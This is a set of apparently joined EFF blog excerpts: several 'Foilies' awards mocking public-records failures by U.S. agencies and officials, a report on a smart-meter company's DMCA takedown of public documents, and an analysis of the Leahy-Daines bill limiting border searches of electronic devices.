Requesting information that has already been made public should be quick and fairly simple—but not when you’re dealing with the Bureau of Indian Affairs. A nomination sent into EFF requested all logs of previously released FOIA information by the BIA. The requester even stated that he’d prefer links to the information, which agencies typically provide for records they have already put on their website. Instead, BIA printed 1,390 pages of those logs, stuffed them into 10 separate envelopes, and sent them via registered mail for a grand total cost to taxpayers of $179.Crime & Punishment Award - Martin County Commissioners, Florida
Generally The Foilies skew cynical, because in many states, open records laws are toothless and treated as recommendations rather than mandates. One major exception to the rule is Florida, where violations of its “Sunshine Law” can result in criminal prosecution.
That brings us to Martin County Commissioners Ed Fielding and Sarah Heard and former Commissioner Anne Scott, each of whom were booked into jail in November on multiple charges related to violations of the state’s public records law. As Jose Lambiet of GossipExtra and the Miami Herald reported, the case emerges from a dispute between the county and a mining company that already resulted in taxpayers footing a $500,000 settlement in a public records lawsuit. Among the allegations, the officials were accused of destroying, delaying and altering records.
The cases are set to go to trial in December 2018, Lambiet told EFF. Of course, people are innocent until proven guilty, but that doesn’t make public officials immune to The Foilies.The Square Footage Award - Jacksonville Sheriff’s Office (Florida)
When a government mistake results in a death, it’s important for the community to get all the facts. In the case of 63-year-old Blane Land, who was fatally hit by a Jacksonville Sheriff patrol car, those facts include dozens of internal investigations against the officer behind the wheel. The officer, Tim James, has since been arrested on allegations that he beat a handcuffed youth, raising the question of why he was still on duty after the vehicular fatality.
Land’s family hired an attorney, and the attorney filed a request for records. Rather than having a complete airing of the cop’s alleged misdeeds, the sheriff came back with a demand for $314,687.91 to produce the records, almost all of which was for processing and searching by the internal affairs division. Amid public outcry over the prohibitive fee, the sheriff took to social media to complain about how much work it would take to go through all the records in the 1,600-foot cubic storage room filled with old-school filing cabinets.
The family is not responsible for the sheriff’s filing system or feng shui, nor is it the family’s fault that the sheriff kept an officer on the force as the complaints—and the accompanying disciplinary records—stacked up.These Aren’t the Records You’re Looking For Award - San Diego City Councilmember Chris Cate
Shortly after last year’s San Diego Comic-Con and shortly before the release of Star Wars: The Last Jedi, the city of San Diego held a ceremony to name a street after former resident and actor Mark Hamill. A private citizen (whose day job involves writing The Foilies) wanted to know: How does a Hollywood star get his own roadway?
The city produced hundreds of pages related to his request that showed how an effort to change the name of Chargers Boulevard after the football team abandoned the city led to the creation of Mark Hamill Drive. The document set even included Twitter direct messages between City Councilmember Chris Cate and the actor. However, Cate used an ineffective black marker to redact, accidentally releasing Hamill’s cell phone number and other personal contact details.
As tempting as it was to put Luke Skywalker (and the voice of the Joker) on speed dial, the requester did not want to be responsible for doxxing one of the world’s most beloved actors. He alerted Cate’s office of the error, which then re-uploaded properly redacted documents.
A Georgia energy company has made two separate attempts to take down public documents that let Seattle residents know how the “smart meters” on their homes work.
Back in 2016, a local activist obtained two documents from the City of Seattle related to the smart meter technology. But some companies involved in making and maintaining that technology went to court and won a quick order that forcing the documents offline by arguing that information about the city’s meters constituted “trade secrets.”
EFF fought back, defending Muckrock’s First Amendment right to publish public documents obtained from a public records request. After our intervention, a Washington state court reversed the takedown order. In mid-2016, a settlement was reached with Landis + Gyr and Sensus, two of the companies that had attempted to remove the documents. Lawyers for the two companies explicitly agreed that the documents could remain public and published at Muckrock’s website.
But in February 2018, Landis + Gyr sent a DMCA notice demanding a takedown of the exact same documents that, two years earlier, they explicitly agreed could remain online. A copy of the smart meter documents was placed on DocumentCloud, by Techdirt, a technology blog that had reported on the initial 2016 proceedings.
Techdirt noted the futility of trying to remove documents that were already online elsewhere, and suggested that all Landis + Gyr is doing is “reminding everyone that (1) these documents exist online and (2) apparently the company would prefer you not look at these public records about its own systems.”
Senators Patrick Leahy (D-VT) and Steve Daines (R-MT) introduced a new bill (S. 2462) that would better protect the privacy of travelers whose electronic devices—like cell phones and laptops—are searched and seized by border agents. While the new bill doesn’t require a probable cause warrant across the board like the Protecting Data at the Border Act (S. 823, H.R. 1899), it does have many positive provisions and would be a significant improvement over the status quo.
The Leahy-Daines bill, which currently has the long title of “A bill to place restrictions on searches and seizures of electronic devices at the border,” applies to U.S. persons, meaning U.S. citizens or lawful permanent residents. The bill places separate restrictions based on the type of search conducted: manual or forensic.
For “manual” searches of electronic devices, the bill requires that border agents—whether from U.S. Customs and Border Protection (CBP) or U.S. Immigration and Customs Enforcement (ICE)—have reasonable suspicion that the traveler violated an immigrations or customs law and that the electronic device contains evidence relevant to the violation. The bill defines a manual search as an examination of an electronic device without the use of forensic software or the entry of a password. (Imagine a hands-on review of photos on a digital camera with no password on it, or a look through a phone not locked by a fingerprint scanner or passcode.) The definition also appears to include any type of search that lasts less than four hours or doesn’t include the copying or documentation of data on the device. By contrast, the bill requires border agents to obtain a probable cause warrant before conducting a “forensic” search of an electronic device.
These rules would be an improvement over CBP’s current policy, which does not require any level of suspicion for manual searches, and requires reasonable suspicion for forensic searches—unless the forensic search is prompted by a “national security concern” (which we believe is a huge loophole). ICE’s policy continues to permit suspicionless border searches of electronic devices.
The Fourth Amendment, however, requires border agents to obtain a probable cause warrant before searching electronic devices given the unprecedented and significant privacy interests travelers have in their digital data. And the Constitution’s protections don’t turn on an arbitrary distinction between manual and forensic searches. Recent updates to CBP’s policy don’t cure the constitutional problems with how either agency conducts border searches (and seizures) of electronic devices.
The Leahy-Daines bill also requires that border agents have probable cause to seize an electronic device. They would then have to obtain a warrant from a judge within 48 hours. If a warrant is not obtained within 48 hours, the device must be “immediately” returned to the traveler. We support this probable cause requirement for device seizures, and it’s what we argue in our civil case against CBP and ICE, Alasaad v. Nielsen.
Importantly, the Leahy-Daines bill includes a suppression remedy if the government violates the law. This means that any information illegally obtained from a traveler’s electronic device during a border search may not be relied upon in any legal, administrative, or legislative proceeding, including an immigration hearing or a criminal trial.
The bill also includes important reporting requirements. These include statistics on the “age, sex, country of origin, citizenship or immigration status, ethnicity, and race” of travelers who were subject to device searches and seizures, which would shed light on whether border agents are acting in a discriminatory manner. The statistics also include the number of travelers whose devices were searched or seized and who were later charged with a crime, which would shed light on how effective device searches and seizures at the border are in rooting out criminals.
The border is not a Constitution-free zone. CBP searched over 30,000 devices last year and the number is rapidly increasing. We are glad to see some members of Congress turning their attention to the rampant problem of unconstitutional border searches and seizures of electronic devices—and the massive privacy invasions by the government that result.